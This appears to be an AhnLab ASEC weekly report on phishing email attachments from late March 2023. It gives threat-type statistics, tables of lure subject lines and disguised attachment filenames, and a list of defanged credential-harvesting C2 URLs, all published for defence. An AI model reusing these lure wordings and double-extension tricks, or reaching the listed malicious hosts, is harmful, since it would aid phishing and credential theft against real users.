AhnLab Security Emergency response Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the week from March 26th, 2023 to April 1st, 2023 and provide statistical information on each type. Generally, phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineering methods. On a broader note, the act is a technical subterfuge that enables the threat actor to perform attacks such as information leaks, malware distribution, and fraud against various targets. The focus of this post will be on the fact that phishing attacks mainly occur through emails. We will also provide a detailed classification of various attack methods that are based on phishing emails. Furthermore, we will make an effort to minimize user damage by introducing new attack types that have never been found before and emails that require users’ caution, along with their keywords. The phishing emails covered in this post will only be those that have attachments. Emails that have malicious links in the body without attachments will be excluded.
Phishing Emails
During this week, the most prevalent threat type seen in phishing email attachments was FakePage with 59%. FakePages are web pages where the threat actor has imitated the screen layout, logo, and font of the real login pages or advertising pages, leading users to enter their account and password information. The input information is sent to the threat actor’s C2 server or used to induce users to access other fake websites. See <FakePage C2> below The second most prevalent threat type was Downloader (22%), which includes loaders such as SmokeLoader and GuLoader. It was then followed by Infostealers (7%) like AgentTesla and FormBook that leak user credentials saved in web browsers, emails, and FTP clients. Aside from those mentioned above, Backdoor (4%) with Infostealer activities and downloading additional malware, Worm (4%), and Trojan (3%) were detected. The threat types using phishing email attachments and their order of prevalence are similar to the order of malware distribution published weekly in the <ASEC Weekly Malware Statistics>.

File Extensions in Phishing Emails
We have identified which file extensions were used by the threats above for the distribution of email attachments. FakePages were distributed through web pages script (HTML, HTM, SHTML) documents that must be executed with a web browser. Other malware, including Infostealer and downloader, came attached to emails with various file extensions including compressed files (ZIP, 7Z, GZ, etc.), IMG disk image files, and DOCX document files.

Cases of Distribution
The following are distribution cases that occurred during the week from March 26th, 2023 to April 1st, 2023. The cases will be classified into FakePage and malware types, including Infostealer, Downloader, Exploit, and Backdoor. The numbers in email subjects and attachment filenames are unique IDs and may vary depending on the email recipient. Distribution cases with Korean subjects were also found. These are cases that specifically targeted Korean users instead of propagating themselves globally using the identical English subject and text.
Case: FakePage
Email Subject | Attachment |
[DHL Express] Notice on Import Tax Payment Deadline – (INV and AWB) ✈ | ParcelDocumentDHL.htm |
Estimate (Order) | 24_153_IBXX 2307_54210_project order.htm |
[FedEx] Guide on Import License. | AWB#.SHTML |
FedEx Request for activating customer number | AWB#989345874598.html |
[** Industry] Request for estimate | ***** Industrial new order 2023-03-24.html |
DHL AWB shipping notice #0861542 | Original Shipping Doc#GM53726192.pdf.htm |
RE: Re: New order price (catalog edited) | 2023LEDprice.html |
Account Suspension (last warning) | Update Account.html |
All received emails have been deferred. | ********.com.html |
You have received an essential encrypted company email | message_790311_832743609.htm |
FedEx Shipment Arrival Notification | FedEx Shippingdocs.htm |
Inquiry | Inquiry.htm |
Attention: Service Suspension (Action Required for ******.co.kr) | Deposit_payment_confirmation.pdf |
Shipment Booking Confirmation – BL Draft is Ready for Review… | Doc_20230327-3938.pdf.html |
Your parcel has arrived urgent pick up needed today. | AWB #8347630147.html |
[SEC=OFFICIAL:Sensitive, ACCESS=Personal Data-Privacy] | Personal Data-Privacy-SecureMessageAtt.html |
There is an important encrypted corporate email you need to read | message_982155_128090224.htm |
Doc signed : Quote Agreement 16 Mar 2023 | Quotation-No#0381.shtml |
Re: Re: [subject line information removed] | W-9 Dt 03.22.2023.one |
New DHL Shipment Document Arrival Notice / Shipping Documents / Original BL, Invoice & Packing List | (DHL) Original BL, PL, CI Copies.htm |
Payment Copy | Payment Copy.gz |
FW:Re:Re: Payment Advice. | Proforma Invoice.html |
RE: Re: [subject line information removed] | form 03.22.2023 Gmail.one |
You have received an essential encrypted company email | message_033902_557044732.htm |
MAERSK LINE SHIPPING DOC SOUNDWORLD ENTERPRISE CO.,LTD | Shipping_Doc.html |
An important encrypted corporate email has been sent to you | SecureMessage.zip |
Pending invoice 10026870-1 | scan_10026870-1.htm |
Original invoice customs clearance notification. | Original-invoice & PList_admins.htm |
EFT Payment-Invoice 0000315: Completed_ Please Review and Sign | Settlement-Payment-On-Hold.pdf |
Your parcel has arrived urgent pick up needed today | Shipping_Doc.htm |
[DHL] Arrival Notice – Original Shipping Document – 2327821366 | scan_document.html |
FW: RE: WIRE INSTRUCTION | Scan_Wire Instruction.PDF.shtml |
Pickup Confirmation Wednesday, March 15, 2023 8:6 a.m.. | Swift_confirmation_copy.PDF.shtml |
RFQ- 1309445 | QUOTATION.pdf |
Attached is the remittance advice payment | 02112022093630.pdf.html |
new order(#0034) request | Invoice.html |
DHL Parcel Delivery Notification | Details.shtml |
Express Package Delivery Notification | AWB#details.html |
There is an important encrypted corporate email you need to read – | message_567890_498055656.htm |
Purchase Order PB2ED146HB2M-047 | Purchase Order PB2ED146HB2M-047.html |
op****@*********.co.kr Signed Document | e-Signed_Doc_____________op****@*********.co.kr.html |
An important encrypted corporate email has been sent to you | FAX_MAIL.zip |
EFT Payment sent On: Wednesday, March 22, 2023 2:53 a.m. | pjhh PaymentVocher.shtml |
Due_lnvoice__countec.comFriday, March 24, 2023 | Inv® #PT947234.htm |
SF Express | WaybillDoc_8945655902.html |
Greeting!!! | GAAS-RFQ#2022061602-KD-Ref.pdf |
maito_op****@*********.co.kr Signed Document | e-Signed_Doc_____________maito_op****@*********.co.kr.html |
Statement of Account | *****.com_SOA00424322332_xls.shtml |
Fw: Re: [subject line info removed] | Electronic form 03.22.2023.one |
An important encrypted corporate email has been sent to you – | message_381082_213244471.htm |
You have received an essential encrypted company email | message_924733_817031910.htm |
Re: FW: [spoofed sender name] | doc_0322.one |
Payment invoice Bank Transfer | Invoice#91273.pdf |
Re: (Urgent Order) – PO# M01552 | PO ella RFQ #M01552-PDF.shtml |
Re: Fw:Inquiry for 2023 New Products Prices | Old Prices.zip |
RE: PO.14036987,14038068 shipping documents and payment via DHL (083AB单) | payment_doc & shipment#7221HKT.htm |
Approved_New_PO0014232023 ******.co.kr | PO_00140323_Beals_Inc_******.co.kr.html |
< Re: New voice message from WIRELESS CALLER 15633963052 > | voicemail_03232023.htm. |
RE: New Invoice Order Payment | NewInvoiceOrderStatement.html |
FW: Payment | invoice sheet.html |
Purchase Order (Sales Invoice) | PurchaseOrderSheet.html |
RE: AMENDED INVOICES | Proforma Invoice.shtml |
Quote us your best offer on the attach order (treat urgently) | Purchase#order.html |
NEW ORDER- OC#8081013559 PO#3495-1022 | New order sign invoice for payment.htm |
Approved_New_PO0014232023 ********.com | PO_00140323_Beals_Inc_********.com.html |
Re: Proforma invoice | Swift Remittance.html |
Approved_New_PO0014232023 *********.com | PO_00140323_Beals_Inc_*********.com.html |
You have received an essential encrypted company email – Remote ID | Securedoc_06593415.html |
You have received an essential encrypted company email – Remote ID | Securedoc_39067527.html |
Approved_New_PO0014232023 ***********.co.kr | PO_00140323_Beals_Inc_**********.co.kr.html |
There is an important encrypted corporate email you need to read | Securedoc_93717448.html |
You have received an essential encrypted company email | Securedoc_23992084.html |
An important encrypted corporate email has been sent to you – | Securedoc_90978661.html |
There is an important encrypted corporate email you need to read – | Securedoc_67152574.html |
Case: Malware (Infostealer, Downloader, etc.)
Email Subject | Attachment |
smart picture don’t show | myplp.exe |
sexy photos | sexpctrs.pif |
sexy pictures | superplp.gif.scr |
super nice images only for you | super_pctrs.scr |
super sexy photo only for you | sex_act.scr |
super sexy pics don’t show | super_img.pif |
super cool images imortant | the_imgs.scr |
super cool picture only for you | private__plp.jpg.exe |
very wonderful pictures | my_plp.gif.scr |
very cool pics | cool-action.gif.exe |
RE: RE: RE: RE: Захтев | 04352562561652.zip |
SOA FROM SHANGHAI LEAGUE/CITI LOGISTICS (USD 16) | SOA #00776122.docx |
Purchase order | 480038_944.r00 |
Credit note for the month of March 2023- 11005605 | SOA.MARCH.iso |
Borch request# RES_AGB_eroFame_DE_2023 Project | RES_AGB_eroFame_EN_2023.zip |
Bussiness Inquiry | Nutribrasalimentos.zip |
Aw: PAYMENTS | 30.03.2023_SWIFT MT 103_9078212345TRF.gz |
Give your best price on the demands | Products Needed__________________pif.arj |
DAMAGE GOODS/SETTLEMENT | Scan Pictures.img |
DHL Express SHIPPING NOTIFICATION | DHL Booking.zip |
FW: QUOTE REQUEST FOR SI-22311 II DOC- SI/MUM/2022-30/00307 II New PO# 10344 // CNEE | New PO# 10344_CNEE.docx |
Fw: Payment Advice – Advice Ref:[A1Xbj7fJ0V7W] /credits / Customer Ref:[BATCHFEB280301] / Second Party Ref:[TRN270323015] | Advice.jpg.7z |
Fw: RE: RFQ – Gauges and accessories | RFQ – Gauges and accessories.zip |
Fw: RE: URGENT****Our inquiry 23/SPEC02781 | SPEC02781.zip |
Employment Status And Salary Advance.. | Employment Status And Salary Advance…img |
LEGAL ACTION / LONG OVERDUE INVOICE | Details Aan Invoice 2.img |
NUEVA ORDEN DE COMPRA | PO-4101927653_APRIL 2023.gz |
New Scanned document from Kciltd Office Printer | Scan_Docs_004521.docx |
MV INLACO ACCORD / ETA: 25TH FEB ++ AGENT NOMINATION | DISCHG.IMG |
Successflly Transferred settlement for outsending SOA | swift.zip |
PO NO 0023 | PO NO 0023.zip |
Po 106069 | PO-1060688.z |
Payment Advice 564302 | Payment Advice 564302.docx |
Permintaan Informasi Harga | RFQ.LM-0107PDF.rar |
Price Inquiry – 28510837398013 | 20230331-28510837398013.rar |
Price Quotation for P/N: 61092-10 | SKM7109Y510S.IMG |
Price Quotation for P/N: ESP1092-10 | ESP15903YI0.IMG |
RE: A/R Down Payment Request 10285 | Bank Slip 30% Advance Payment to enable production of the goods.zip |
RE: FedEx Notification of Arrival – AWB# 102235516763 | FedEx Express AWB#102235516763.rar |
RE: PRO-FORMA INVOICE NO-1820Q/2023 | PI-1820Q.xls |
RE: Please Confirm Payment | Payment Copy USD14,000.zip |
RE: Request For Quote – Urgent ! | MRSK0052447.IMG |
RE: UPDATED SOA | 4970528.xls |
RE:FedEx Notification of Arrival – AWB# 102235516763 | FedEx Receipt_1022355161763.rar |
REVISED -Order 5879024-00/PO 4677/PO 4678 | PO feb.docx |
RFQ-WES/510/92/810 | WES51092Y810.IMG |
Re: Order-CHW/U2/SI/22-23/3534 | Order-CHWU2SI22-233534.xls |
Re: super smart pics | greatpctrs.exe |
Re:Request for Quotation | UPDATED_LIST.7z |
Retiro | retiro-pdf.gz |
Re[3]: wonderful images imortant | great-photos.gif.pif |
Re[3]: super nice images only for you | wild__action.jpg.scr |
Re[3]: very wonderful photos private | wild-plp.jpg.exe |
Re[2]: nice photos only for you | priv__scene.jpg.scr |
Re[2]: super smart pics just for you | fuck__images.gif.exe |
Re[2]: very nice picture | great__img.jpg.scr |
Re[2]: very nice picture imortant | bestimgs.scr |
Re[4]: very wonderful photos | prv_action.exe |
Re[5]: nice picture imortant | priv__act.exe |
Re[5]: super cool photo | priv__action.scr |
Re[5]: smart photo | fuckimages.pif |
Re[5]: very nice photos | fuck__pctrs.jpg.scr |
Rechnung, ausstehende Zahlung | RH-0987654345678.Z |
Reference Notice | Reference Notice_pdf.rar |
Request For Quotation | QUOTATION.zip |
Request For Quote #182044-13 | PO.xls |
Request for Quote | RFQ.exe |
World Surfaris Remittance | Balance$1,234,000,45-pdf.gz |
TOTSA – Request For Quotation | RFQ005412.IMG |
UPDATED SOA | Overdue soa.zip |
Urgent Order | Product Lists2.PDF.img |
cool pics | privateaction.pif |
beautiful photo | myscene.jpg.pif |
enquiry_2703_023 | enquiry_2703_023.rar |
The ASEC analysis team has selected keywords that users must look out for, based on the distribution cases above. If these keywords are included in the subject of the email, or if the same characteristics are found, users must exercise strict caution as they may be phishing emails from threat actors.
Keywords to Beware of: ‘PDF Online’
The keyword for this week is ‘PDF Online.’ A phishing website disguised as ‘PDF Online’ has been distributed recently. The fake webpage was mentioned in the ASEC Weekly Phishing Email Threat Trends uploaded in March 17th. The phishing email was impersonating a Korean company and was written in fluent Korean. As such, it is likely that the email was created with actual leaked content. Such phishing emails are attached with HTML script files. This is a fake page that prompts users to enter their IDs and passwords with the text ‘PDF Online.’ When the users input their account credentials, the information is leaked to the threat actor’s server; thus, the information should not be entered.
- Phishing URL: https[:]//naturaverdebeauty[.]com/justld/next.php


FakePage C2 URL
When users enter their IDs and passwords on the login pages among the FakePages created by the threat actor, their information is sent to the attacker’s server. The list below shows the threat actor’s C2 addresses of fake login pages distributed during the week.
- https[:]//formspree[.]io/f/myyazkbv
- https[:]//neduet[.]hosting[.]acm[.]org/pdf[.]php
- https[:]//submit-form[.]com/rS8vx7dD
- https[:]//razarmanagement[.]com/192[.]185[.]224[.]69/,/ue/postdhll[.]php
- http[:]//ns2[.]wrsc[.]org/sites/all/libraries/elfinder/files/index/kugo/FedExpress[.]php
- https[:]//formspree[.]io/f/xgebzovk
- http[:]//tzp[.]com[.]pk/wp-admin/fte[.]php
- https[:]//archerhall[.]com/wp-admin/Exc/Excell[.]php
- https[:]//www[.]calvellirappresentanze[.]com/wp-content/plugins/TOPXOH/index/index/1/add[.]php
- https[:]//escolagirassol[.]com[.]br/dd/ddhl[.]php
- https[:]//formspree[.]io/f/mdovedpp
- https[:]//formspree[.]io/f/moqzlyod
- https[:]//hobbyless-features[.]000webhostapp[.]com/pdf[.]php
- https[:]//gooddreams[.]co[.]in:/smhh/webapp[.]php
- https[:]//elhdlwfa2o4[.]sa[.]com/horn/log1234567[.]php
- https[:]//undebauched-hyphens[.]000webhostapp[.]com/dhlc[.]php
- https[:]//formspree[.]io/f/moqzllag
- https[:]//alemadistones[.]com/secure/Citizen/Exo/css/FX/cloudlog[.]php
- https[:]//submit-form[.]com/NhEAc2e9
- https[:]//firp[.]governo[.]ao/plauge/vmxll[.]php
- https[:]//formspree[.]io/f/mdovdokw
- https[:]//cambiamarcia[.]net/wp-includes/pdf[.]php
- https[:]//formspree[.]io/f/xnqyzrzj
- https[:]//www[.]nrwolff[.]com[.]br/wp-admin/maint/bv/mxl[.]php
- https[:]//qleapinnovations[.]com/peeking/peeking[.]php
- https[:]//archerhall[.]com/wp-admin/php/pdf[.]php
- https[:]//izmirlist[.]com//2Ae/jotform[.]php
- https[:]//naturaverdebeauty[.]com/justld/next[.]php
Attacks using phishing emails are disguised with content that can easily deceive users, such as invoices and tax payments, to induce users to access fake login pages or execute malware. Fake login pages are evolving by the second to closely resemble the original pages. The attackers pack malware in compressed file formats to escape the attachment scans of users’ security products. Users must practice strict caution and refer to recent cases of distribution to avoid being exposed to infection by malicious phishing emails. The ASEC analysis team recommends users follow the email security guidelines below.
- Do not execute links and attachments in emails from unverified senders until they are proven to be credible.
- Do not enter sensitive information such as login account credentials until the site is found to be reliable.
- Do not execute attachments with unfamiliar file extensions until they are found to be reliable.
- Use security products such as antimalware software.
According to the MITRE ATT&CK framework, phishing email attacks correspond to the following techniques.
- Phishing for Information (Reconnaissance, ID: T1598[1])
- Phishing (Initial Access, ID: TI1566[2])
- Internal Spearphishing (Lateral Movement, ID: T1534[3])
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Statistics
[…] Read more… […]